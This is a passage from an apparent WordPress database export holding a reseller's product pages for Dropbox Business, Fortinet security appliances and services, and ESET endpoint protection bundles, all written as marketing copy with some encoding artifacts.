access.\r\n\r\n<strong>Dropbox Paper</strong>\r\nA simple, powerful way to create, share, and keep your team in sync â€” with the added benefit of admin controls.\r\n\r\n<strong>Smart Sync</strong>\r\nAccess every file in their Dropbox, right from their desktop, using very little hard disk space.\r\n\r\n<strong>Admin dashboard</strong>\r\nMonitor team activity, view connected devices, and audit sharing activity.\r\n\r\n<strong>Account transfer tool</strong>\r\nEasily transfer files from one user to another when responsibilities change.\r\n\r\n<strong>Dropbox Showcase</strong>\r\nPresent work in a professionally-packaged page and track who engages with your files.\r\n\r\n<strong>Remote wipe</strong>\r\nClear files from lost or stolen devices to keep company files in the right hands.\r\n\r\n<strong>Third-party app integrations</strong>\r\nExtend the power of Dropbox with over 300,000 connected apps.\r\n\r\n<strong>Live support</strong>\r\nQuickly get answers to your questions via priority phone, email, and chat support.\r\n\r\n\r\n&nbsp;\r\n<h2 class=\"c01-section-heading-plank__headline c01-section-heading-plank__headline--three\">Keep your team productive and your data safe</h2>\r\n\r\n<strong>File backup</strong>\r\nGet the storage your business needs to share and collaborate seamlessly.\r\n\r\n<strong>Team collaboration</strong>\r\nStay productive with new ways to easily share work and collect feedback.\r\n\r\n<strong>Administrative tools</strong>\r\nTeam management stays simple from a central location, the admin console.\r\n\r\n<strong>Security features</strong>\r\nProtect sensitive company files with enterprise-grade security features.\r\n\r\n&nbsp;\r\n<center>[maxbutton id=\"1\" ]</center>','Dropbox','','publish','closed','closed','','dropbox','','','2019-09-25 16:17:16','2019-09-25 08:17:16','',0,'https://bintara.com.my/?page_id=1473',0,'page','',0),(1474,1,'2018-12-11 14:13:25','2018-12-11 06:13:25','<strong style=\"font-size: 2em; color: #000;\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">ï»¿</span>Fortinet</strong> provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our uniqueÂ security fabricÂ combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration.\r\n\r\nFortiGate is available in a wide range of sizes and form factors to fit any environment and provides a broad array of next-generation security and networking functions. Complementary products can be deployed with a FortiGate to enable a simplified, end-to-end security infrastructure covering:\r\n<ul>\r\n 	<li>Network security</li>\r\n 	<li>Multi-Cloud security</li>\r\n 	<li>Web Application Security</li>\r\n 	<li>Email security</li>\r\n 	<li>Advanced Threat Protection</li>\r\n 	<li>Secure Unified Access</li>\r\n 	<li>Endpoint security</li>\r\n 	<li>Management and Analytics</li>\r\n</ul>\r\n&nbsp;\r\n<h2><strong>NETWORK SECURITY</strong></h2>\r\n<h4>1. Next Generation Firewall (NGFW)</h4>\r\nFortiGate enterprise firewalls offer flexible deployments from the network edge to the core, data center, internal segment, and the Cloud. FortiGate enterprise firewalls leverages purpose-built security processors (SPUs) that delivers scalable performance of advanced security services like Threat Protection, SSL inspection, and ultra-low latency for protecting internal segments and mission critical environments.\r\n<h5></h5>\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>High-performance threat protection</strong></h5>\r\n</li>\r\n</ul>\r\nIndustry\'s highest threat protection and SSL inspection performance to protect from malware attacks hiding in encrypted traffic.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Validated security effectiveness</strong></h5>\r\n</li>\r\n</ul>\r\nIndependently certified and continuous threat intelligence updates provide robust protection from known and unknown attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Protect mission critical applications</strong></h5>\r\n</li>\r\n</ul>\r\nHighly scalable segmentation and ultra-low latency to protect network segments.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Continuous risk assessment via automation</strong></h5>\r\n</li>\r\n</ul>\r\nLeverage automated workflow and auditing features to deal with scarce security staff and continuously maintain compliance posture.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntelligently share threats across the entire digital attack surface to provide quick and automated protection.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enterprise class security management</strong></h5>\r\n</li>\r\n</ul>\r\nDeliver consistent security policy -- Single pane-of-glass to manage security assets irrespective of location and form factor.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Secure SD-WAN</strong></h4>\r\nFortinet is the only NGFW vendor to provide native SD-WAN along with integrated advanced threat protection. Fortinet, has received the â€œRecommendedâ€ rating for the first ever test conducted by NSS Labs for Software-Defined Wide Area Networking. Fortinet delivered excellent quality of experience for voice and video, high VPN throughput and best price/performance. FortiGate SD-WAN replaces separate WAN routers, WAN optimization, and security devices with a single solution that is application-aware, offers automatic WAN path control and multi-broadband support. It improves application performance, reduces WAN Operating expenses and minimizes management complexity.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>Application aware solution, support a broad range of 3000+ applications as well as granular visibility into sub-applications.</li>\r\n 	<li>Path awareness intelligence to monitor application-level transactions, and dynamically failover to the best available path.</li>\r\n 	<li>Single-pane-of-glass management simplifies deployment, management and monitoring of SD-WAN devices.</li>\r\n 	<li>Reduced complexity and high total cost of ownership by using best of breed SD-WAN and NGFW functionality on a single appliance.</li>\r\n 	<li>Improve cloud application performance by prioritizing business critical applications and enabling branches to directly communicate to the internet.</li>\r\n 	<li>Reduce operating expenses by migrating from MPLS and utilizing multi-broadband such as Ethernet, DSL, and LTE.</li>\r\n</ul>\r\n&nbsp;\r\n<h4>3.Â <strong>IPS</strong></h4>\r\nWhether part of a firewall solution or a separate standalone appliance, Intrusion Prevention Systems (IPS) technology is becoming an increasingly ubiquitous part of network security defenses. Fortinet, well known for its next-generation firewall (NGFW) solution, has built IPS technology for more than ten years. Fortinet customers expect and depend on high performance from FortiGate firewalls and FortiGate IPS benefits from this legacy, delivering pound-for-pound, the best IPS performance available in the market today. FortiGate IPS, following a different evolution path than traditional IPS, innovates in ways that other standalone IPS products do not.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>World-class Protection</strong></h5>\r\n</li>\r\n</ul>\r\nDeep inspection for advanced threats, botnets, zero days and targeted attacks on the network.\r\n<ul>\r\n 	<li>\r\n<h5><strong>High performance</strong></h5>\r\n</li>\r\n</ul>\r\nInnovative security processor (SPU) technology for high-performance network throughput and deep security inspection.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Advanced threat protection</strong></h5>\r\n</li>\r\n</ul>\r\nSeamless integration â€“ appliance or cloud service â€“ with world-class sandboxing for advanced threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration and automation with Fortinetâ€™s broad product portfolio and partner ecosystem.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Data leak protection</strong></h5>\r\n</li>\r\n</ul>\r\nFile protection controls to prevent sensitive data exfiltration.\r\n\r\n&nbsp;\r\n<h4>4.Â <strong>Crypto VPNs</strong></h4>\r\nMaintaining uniform security policy for all corporate users, applications, devices irrespective of their location and appropriate access control is essential to providing security in a multi-cloud environment. The data in motion must be protected using mutual authentication and confidentiality to protect sensitive corporate data over unprotected networks and provides a defensible proof of security.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Hardware assisted encryption</strong></h5>\r\n</li>\r\n</ul>\r\nPrevent breaches and secure data in transit at a very high speed.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Scalable Security</strong></h5>\r\n</li>\r\n</ul>\r\nScalable security that is seamlessly integrated with routing.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Comprehensive data communications security</strong></h5>\r\n</li>\r\n</ul>\r\nProtects Application to Application, User to Users, User to Machine, Machine to Machine communication.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Diverse VPNs</strong></h5>\r\n</li>\r\n</ul>\r\nIPsec or SSL based diverse VPNs to offer flexible secure network choices.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nShare FortiTelemetry information across site-to-site tunnels with required confidentiality.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unified Management</strong></h5>\r\n</li>\r\n</ul>\r\nSimplified, easy-to-manage, single pane of glass to manage large scale crypto VPNs, Routing and NGFW.\r\n\r\n&nbsp;\r\n<h4>5.Â <strong>Secure Web Gateway (SWG)</strong></h4>\r\nFortinet firewalls with Gateway Security protects enterprises against web attacks with URL filtering, visibility and control of encrypted web traffic via SSL inspection, and application of granular web application policies. Fortinet is the first and only gateway security vendor to earn Virus Bulletinâ€™s VBWeb certification for web filtering effectiveness.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>Feature-rich product that consolidates NGFW and SWG services.</li>\r\n 	<li>Powerful hardware that can perform SSL deep inspection.</li>\r\n 	<li>Anti-malware techniques updated with the latest threat intelligence.</li>\r\n 	<li>Reduce security teamâ€™s workload by providing a single pane of glass management for both NGFW and SWG.</li>\r\n 	<li>Effectively remove blind spots in encrypted traffic, without compromising on performance.</li>\r\n 	<li>Stay protected against the latest known and unknown internet-borne attacks.</li>\r\n</ul>\r\n&nbsp;\r\n<h4><strong>6.Â Management &amp; Reporting</strong></h4>\r\nSecurity teams globally are challenged by resource constraints, both in terms of the number of staff and raw security talent. Moreover, security teams are asked to do more, often in more complex networks and with growing numbers of alerts from multiple systems. Successful security teams allay these challenges by implementing three best practices. First, they simplify the way view management, combining operation NOC-style views with security-based SOC context. Second, they regularly measure and score their security effectiveness, enabling them anytime to answer how secure they are. Third, they demand deep integration so they can automate repetitive actions, especially across silos when possible.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Operationalized Visibility</strong></h5>\r\n</li>\r\n</ul>\r\nBig picture perspective allows you to see the forest through the tree.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Cross Silo Automation</strong></h5>\r\n</li>\r\n</ul>\r\nDeeper than mere integration, orchestrate workflow responses to triggered security events.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Simplified Management</strong></h5>\r\n</li>\r\n</ul>\r\nStreamline deployment and management, reducing task time and improving response time.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Rapid Detection</strong></h5>\r\n</li>\r\n</ul>\r\nConsolidate telemetry and alerts to uncover patterns and discover security insights.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Fortinet Fabric</strong></h5>\r\n</li>\r\n</ul>\r\nCentralized control over all of your Fortinet network assets.\r\n\r\n&nbsp;\r\n<h2>INFRASTRUCTURE PROTECTION</h2>\r\n<h4><strong>1. Endpoint Protection</strong></h4>\r\nEndpoints are frequently the target of initial compromise or attacks. FortiClient strengthens endpoint security through integrated visibility, control, and proactive defense. With the ability to discover, monitor, and assess endpoint risks, you can ensure endpoint compliance, mitigate risks, and reduce exposure. FortiClient proactively defends against advanced attacks. Its tight integration with the Security Fabric enables policy-based automation to contain threats and control outbreaks. FortiClient is compatible with Fabric-Ready partners to further strengthen enterprisesâ€™ security posture.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Broad endpoint visibility</strong></h5>\r\n</li>\r\n</ul>\r\nFortiClient Fabric Agent integrates endpoints into the Security Fabric and provides endpoint telemetry, including user identity, protection status, risk scores, unpatched vulnerabilities, security events, and more.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Proactive endpoint defense</strong></h5>\r\n</li>\r\n</ul>\r\nAnti-exploit, sandbox integration, and behavior and pattern-based malware detection proactively detect and block malware, malicious scripts, document-based, and other advanced attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Automated threat containment</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration with the Security Fabric enables automated response. Mitigate unpatched vulnerabilities, alert users, and quarantine risky or compromised endpoints to stem an outbreak.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Secure remote access</strong></h5>\r\n</li>\r\n</ul>\r\nReliable, simple, and secure remote access with built-in, always-on VPN, with the added security of two-factor authentication, plus single-sign-on capabilities.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Easy to deploy and manage</strong></h5>\r\n</li>\r\n</ul>\r\nEasy to deploy and manage Modular and light-weight endpoint agents are centrally managed with the Enterprise Manager Server (EMS). Fabric Agent is compatible with Fabric-Ready endpoint security solutions.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Wireless</strong></h4>\r\nFortinet provides a full suite of Wi-Fi Access Point and WLAN Controller products as part of our Secure Access solution designed to address the unique requirements of every organization. For assistance choosing an AP, our AP Product selector can be found here. Configuration and control of your wireless environment can be done directly with a FortiGate or via our dedicated Wireless LAN controllers. Fortinet also offers FortiManager and FortiCloud as management solutions for the entire Fortinet security fabric. All Fortinetâ€™s wireless solutions integrate with our location analytics platform: FortiPresence. This enables real-time locationing and device tracking.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration with FortiGate firewalls extends your security fabric out to the edge of the network.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Superior density, scalability and mobilit</strong><strong>y</strong></h5>\r\n</li>\r\n</ul>\r\nHandle even the most complex RF environments.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Zero-touch deployment</strong></h5>\r\n</li>\r\n</ul>\r\nFast and simple deployment with no requirements for onsite tech support.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Simplified deployment and capacity expansion</strong></h5>\r\n</li>\r\n</ul>\r\nNo licenses to manage, just plug and go.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Free location and analytics</strong></h5>\r\n</li>\r\n</ul>\r\nWireless device locationing tools included with no additional licenses required.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Scalability from 1 to 10,000 APs</strong></h5>\r\n</li>\r\n</ul>\r\nA range of platforms for any sized deployment.\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>Switching</strong></h4>\r\nLegacy Ethernet LANs face many challenges including exponential growth in devices and applications, increased throughput demands from wireless LANs, and complex security implementations. Rather than asking how to secure traditional Ethernet LANs, Fortinet takes a security centric approach offering Ethernet as an extension of the security infrastructure through FortiSwitch and FortiLink. FortiSwitch offers a broad portfolio of secure, simple, and scalable Ethernet switches for applications that range from desktop to data center.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration with FortiLink</strong></h5>\r\n</li>\r\n</ul>\r\nFortiGate management of FortiSwitch extends Security Fabric features to the Ethernet access layer.\r\n<ul>\r\n 	<li>\r\n<h5><strong>No Touch Provisioning and Management with FortiLink</strong></h5>\r\n</li>\r\n</ul>\r\nAuto discovery, Global VLAN and Security Policies, Firewall interfaces and Ethernet ports equally secure.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Highly Scalable</strong></h5>\r\n</li>\r\n</ul>\r\nBroad portfolio of stackable 1, 10, and 40 GE access ports with up to 100 GE uplinks to scale from desktop to datacenter.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unparalleled Visibility</strong></h5>\r\n</li>\r\n</ul>\r\nSingle pane of glass management of both Security and Network Access, Device detection and port visibility.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enable voice, data, and wireless traffic across a single network</strong></h5>\r\n</li>\r\n</ul>\r\nPower network and IoT devices with POE, Auto provision using LLDP-MED.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Virtual Stacking</strong></h5>\r\n</li>\r\n</ul>\r\nFortiLink enables stacking across IDFs when managed, up to 300 switches based on FortiGate model.\r\n\r\n&nbsp;\r\n<h4>4.Â <strong>Email Security</strong></h4>\r\nEmail security remains a key productivity tool for today\'s organizations, as well as a successful attack vector for cyber criminals. FortiMail Email security utilizes the latest technologies and security services from FortiGuard Labs to deliver consistently top-rated protection from common and advanced threats while integrating robust data protection capabilities to avoid data loss.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Top-rated Antispam and Antiphishing</strong></h5>\r\n</li>\r\n</ul>\r\nMaintain productivity by shielding end users from unwanted spam and malicious phishing attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Independently certified advanced threat defense</strong></h5>\r\n</li>\r\n</ul>\r\nThwart cyber criminals intent on stealing data, holding systems for ransomware, conducting fraud, and other malicious purposes.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Integrated data protection</strong></h5>\r\n</li>\r\n</ul>\r\nMaintain the privacy of personal information and confidentiality of sensitive data in compliance with regulatory and corporate guidelines.\r\n<ul>\r\n 	<li>\r\n<h5><strong>High-performance mail handling</strong></h5>\r\n</li>\r\n</ul>\r\nSpeed the delivery of legitimate email at an affordable cost.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Enterprise-class management</strong></h5>\r\n</li>\r\n</ul>\r\nFree staff and end users to drive the business by reducing time spent on email administration.\r\n\r\n&nbsp;\r\n<h2>APPLICATION SECURITY</h2>\r\n<h4><strong>1. Web Application Firewall (WAF)</strong></h4>\r\nUnprotected web applications are the easiest point of entry for hackers and vulnerable to a number of attack types. FortiWebâ€™s AI-enhanced and multi-layered approach protects your web apps from the OWASP Top 10 and more. When combined with our Web Application Security Service from FortiGuard Labs youâ€™re protected from the latest application vulnerabilities, bots, and suspicious URLs, and with dual machine learning detection engines your applications are safe from sophisticated threats such as SQL injection, cross-site scripting, buffer overflows, cookie poisoning, malicious sources, and DoS attacks.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Proven Web Application Protection</strong></h5>\r\n</li>\r\n</ul>\r\nFortiWeb protects against all the OWASP Top-10 threats, DDoS attacks and many others to defend your mission critical web-based applications.\r\n<ul>\r\n 	<li>\r\n<h5><strong>AI-based Threat Detection</strong></h5>\r\n</li>\r\n</ul>\r\nIn addition to regular signature updates and many other layers of defenses, FortiWebâ€™s AI-based, dual-layer machine learning engines protect against zero-day attacks.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nIntegration with FortiGate firewalls and FortiSandbox deliver protection from advanced persistent threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Hardware-based Acceleration</strong></h5>\r\n</li>\r\n</ul>\r\nFortiWeb delivers industry-leading protected WAF throughputs and blazing fast secure traffic encryption/decryption.\r\n<ul>\r\n 	<li>\r\n<h5><strong>False Positive Mitigation Tools</strong></h5>\r\n</li>\r\n</ul>\r\nAdvanced tools that minimize the day-to-day management of policies and exception lists to ensure only unwanted traffic is blocked.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Advanced Visual Analytics</strong></h5>\r\n</li>\r\n</ul>\r\nFortiWebâ€™s visual reporting tools provide detailed analyses of attack sources, types and other elements that provide insights not available with other WAF solutions.\r\n\r\n&nbsp;\r\n<h4>2.Â <strong>Application Delivery Controller</strong></h4>\r\nWith bandwidth demand growing faster than budgets and cyber-attacks constantly on the rise, it can be challenging to securely and efficiently deliver applications at the speed your users expect. Fortinet Application Delivery Controller (ADC) appliances optimize the availability, user experience, and scalability of enterprise application delivery. They enable fast, secure, and intelligent acceleration and distribution of even the most demanding enterprise applications.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Secure Traffic Management</strong></h5>\r\n</li>\r\n</ul>\r\nSSL offloading, forward proxy and visibility increase responsiveness and assist in scanning for threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Application Optimization</strong></h5>\r\n</li>\r\n</ul>\r\nSpeed web application delivery with compression, caching, HTTP 2.0, and HTTP Page Speed-UP.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Fabric Integration</strong></h5>\r\n</li>\r\n</ul>\r\nAV and Sandbox integration scans attachments to protect from the latest threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Global Server Load Balancing</strong></h5>\r\n</li>\r\n</ul>\r\nDistributes traffic across multiple geographical locations for disaster recovery.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Security Features</strong></h5>\r\n</li>\r\n</ul>\r\nWeb Application Firewall, Web Filtering, and IP Reputation for enhanced security.\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>DDoS</strong></h4>\r\nDistributed Denial of Service (DDoS) attacks are ever-evolving and use a variety of technologies. To successfully combat these attacks, you need a dynamic, multi-layered security solution. FortiDDoS protects from both known and zero day attacks with very low latency. Itâ€™s easy to deploy and manage, and includes comprehensive reporting and analysis tools.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>100% security processor (SPU)-based layer 3, 4, and 7 DDoS protection application-aware traffic management.</li>\r\n 	<li>Ability to monitor hundreds of thousands of parameters simultaneously.</li>\r\n 	<li>Behavior-based DDoS protection to eliminate need for signature files.</li>\r\n 	<li>Minimal false-positive detections through continuous threat evaluation.</li>\r\n 	<li>Attack protection for DNS services via specialized tools.</li>\r\n 	<li>Defense against every DDoS attack: bulk volumetric, layer 7 application, and SSL/HTTPS.</li>\r\n</ul>\r\n&nbsp;\r\n<h2>THREAT DETECTION &amp; PREVENTION</h2>\r\n<h4><strong>1. Sandbox</strong></h4>\r\nWith the increasing volume and sophistication of cyber-attacks, it takes only one threat to slip through security for a data breach to occur. CISOs have adopted sandboxing as an essential component of their security strategies to help combat previously unknown threats. While attack surfaces are becoming more dynamic due to the rise of IoT and cloud-based services, a continuing shortage of cyber security talent is driving organizations to integrate sandboxing with greater controls and a high degree of automation.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li><strong>Broad integration</strong></li>\r\n</ul>\r\nExtends advanced threat protection to your next-generation firewall, web application firewall, secure email gateway, and endpoint protection platform.\r\n<ul>\r\n 	<li><strong>Intelligent automation</strong></li>\r\n</ul>\r\nSpeeds mitigation by sharing real-time updates to disrupt threats at the origin and subsequent immunization across the entire organization and the global community.\r\n<ul>\r\n 	<li><strong>All-in-one</strong></li>\r\n</ul>\r\nSimplifies deployment and reduces complexity by covering all protocols in a single common sandbox platform.\r\n<ul>\r\n 	<li><strong>Flexible deployment</strong></li>\r\n</ul>\r\nAvailable as a physical or virtual appliance on premises, as well as a cloud-based or managed service.\r\n<ul>\r\n 	<li><strong>Open extensibility</strong></li>\r\n</ul>\r\nFlexible APIs for easy third-party integration and available day-zero integration with Fabric-Ready partners.\r\n\r\n<h4><strong>2.Â FortiSIEM</h4></strong>\r\n\r\nSecurity management only gets more complex. Endpoints, IoT, Infrastructure, Security Tools, Applications, VMâ€™s and Cloud â€“ the number of things you need to secure and monitor grows constantly. FortiSIEM â€“ Fortinetâ€™s Multivendor Security Incident and Events Management solution brings it all together. Visibility, Correlation, Automated Response and Remediation in a single, scalable solution. Using a Business Services view, the complexity of managing network and security operations is reduced, freeing resources, improving breach detection. Worldwide 80% of breaches go undetected because of skills shortage and event information â€˜noiseâ€™. FortiSIEM provides the cross correlation, applies machine learning and UEBA to improve response, to stop breaches before they occur.\r\n<h5><strong>Features and Benefits</strong></h5>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Asset Self-Discovery</strong></h5>\r\n</li>\r\n</ul>\r\nVisibility needs to be both comprehensive and granular â€“ understanding a devices contextual capabilities and vulnerabilities reduces false positives.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Rapid Integrations and Scalability</strong></h5>\r\n</li>\r\n</ul>\r\nNetwork aware and security tool agnostic operations and management get a real-time business view of availability, utilization and security posture.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Automated Workflow</strong></h5>\r\n</li>\r\n</ul>\r\nA leading SOAR (Security Orchestration and Automated Response engine) the FortiSIEM Remediation Library responds to threats with the security tools you have today, and will grow with your enterprise.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Unified Platform</strong></h5>\r\n</li>\r\n</ul>\r\nMulti-tenancy for role-based access to a unified platform. Of benefit to MSPâ€™s and Enterprise customers alike â€“ deliver services and reports to a customer or a report. Share actionable intelligence and deliver value without compromise.\r\n\r\n&nbsp;\r\n<h4>3.Â <strong>User and Entity Behavior Analytics (UEBA)</strong></h4>\r\nFortinet User and Entity Behavior Analytics (UEBA) technology protects organizations from insider threats by continuously monitoring users and endpoints with automated detection and response capabilities. Leveraging machine learning and advanced analytics, Fortinet UEBA automatically identifies non-compliant, suspicious, or anomalous behavior and rapidly alerts any compromised user accounts. This proactive approach to threat detection delivers an additional layer of protection and visibility, whether users are on or off the corporate network.\r\n<h3><strong>Features and Benefits</strong></h3>\r\n<ul>\r\n 	<li>\r\n<h5><strong>Augmented Intelligence (AI)</strong></h5>\r\n</li>\r\n</ul>\r\nEnhanced data visibility with machine learning and UEBA to identify threats.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Rapid Threat Detection</strong></h5>\r\n</li>\r\n</ul>\r\nAI optimizes each stage of the threat investigation pipeline, shining a light on the unknown.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Regulatory Compliance Support</strong></h5>\r\n</li>\r\n</ul>\r\nSupport regulatory compliance with a dedicated reporting tool, to respond to and manage potential non-compliant activity.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Data Security</strong></h5>\r\n</li>\r\n</ul>\r\nMonitor data movement and endpoint activity 24/7 regardless of location or device, whether users are on or off your network.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Forensic-level Reporting</strong></h5>\r\n</li>\r\n</ul>\r\nCompile a full forensic history of user behavior, enabling thorough forensics investigation and detailed reporting.\r\n<ul>\r\n 	<li>\r\n<h5><strong>Valuable Insights</strong></h5>\r\n</li>\r\n</ul>\r\nAnalyze data and deliver valuable insights, allowing your team to contain insider threats and respond in real time.\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\">[maxbutton id=\"1\" ]</p>','Fortinet','','publish','closed','closed','','fortinet','','','2019-09-30 14:25:44','2019-09-30 06:25:44','',0,'https://bintara.com.my/?page_id=1474',0,'page','',0),(1477,1,'2018-12-11 14:12:44','2018-12-11 06:12:44','<h2><strong>Protecting you worldwide</strong></h2>\r\nESET is here to secure your computers and devices, protect your precious family pictures and data, or keep your company know-how safe. We protect users just like you across 200 countries and territories worldwide, helping them to use and explore all the great opportunities of the Internet. We are proud that so many individuals and companies trust us to secure their digital lives.\r\n\r\n&nbsp;\r\n<h2><strong>Efficient endpoint security for small businesses</strong></h2>\r\n<h3><strong>Manage network security via the cloud. NoÂ need for extra hardware</strong></h3>\r\nManage IT security conveniently using ESET Cloud Administrator.Â Benefit from a single-point overview of your network security. Receive notifications as incidents occur. React immediately from wherever you are.\r\n\r\n<img class=\"wp-image-2446 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/eset.png\" alt=\"\" width=\"291\" height=\"203\" />\r\n\r\n&nbsp;\r\n<ul>\r\n 	<li>All your network security management in one place</li>\r\n 	<li>Secure access via web browser</li>\r\n 	<li>Always the latest version â€“ updates automatically</li>\r\n 	<li>No need for extra hardware</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h2><strong>Bundled solutions for small size business</strong></h2>\r\n<ol>\r\n 	<li>\r\n<h4><strong>ESET Secure Business Cloud</strong></h4>\r\n</li>\r\n</ol>\r\nComplete bundled security solution for endpoints and file servers. Email-borne threats blocked at server level. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Protection of email gateway</li>\r\n 	<li>Cloud-based remote management</li>\r\n</ul>\r\n<ol start=\"2\">\r\n 	<li>\r\n<h4><strong>ESET Endpoint Protection Advanced Cloud</strong></h4>\r\n</li>\r\n</ol>\r\nMultilayered technology, machine learning and human expertise combined with automated security management. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Cloud-based remote management</li>\r\n</ul>\r\n<ol start=\"3\">\r\n 	<li>\r\n<h4><strong>ESET Endpoint Protection Advanced</strong></h4>\r\n</li>\r\n</ol>\r\nMultilayered technology, machine learning and human expertise combined with automated security management. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h2><strong>Dynamic endpoint security for mid-size businesses</strong></h2>\r\n<h3><strong>Easy to use, single interface management of your endpoint security</strong></h3>\r\nESET Security Management Center provides a real-time overview of all your on-premise and off premise endpoints via an enterprise-grade console. Benefit from full reporting and security management for all operating systems.\r\n\r\n<img class=\"wp-image-2447 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/mid-size.png\" alt=\"\" width=\"269\" height=\"177\" />\r\n<ul>\r\n 	<li>Complete network visibility</li>\r\n 	<li>Full security management</li>\r\n 	<li>Flexible reporting</li>\r\n 	<li>Automated security management</li>\r\n</ul>\r\n\r\n&nbsp;\r\n<h2><strong>Bundled solutions for mid size business</strong></h2>\r\n<ol>\r\n 	<li>\r\n<h4><strong>ESET Secure Business</strong></h4>\r\n</li>\r\n</ol>\r\nComplete bundled security solution for endpoints and file servers. Email-borne threats blocked at server level. Provides:\r\n<ul>\r\n 	<li>Protection against targeted attacks</li>\r\n 	<li>Protection against ransomware</li>\r\n 	<li>Prevention of fileless attacks</li>\r\n 	<li>Protection of email gateway</li>\r\n 	<li>Remote management</li>\r\n</ul>\r\n<ol start=\"2\">\r\n 	<li>\r\n<h4><strong>ESET Dynamic Endpoint Protection</strong></h4>\r\n</li>\r\n</ol>\r\nEnterprise-grade award-winning ESET endpoint protection with cloud-based sandboxing technology. Incorporates 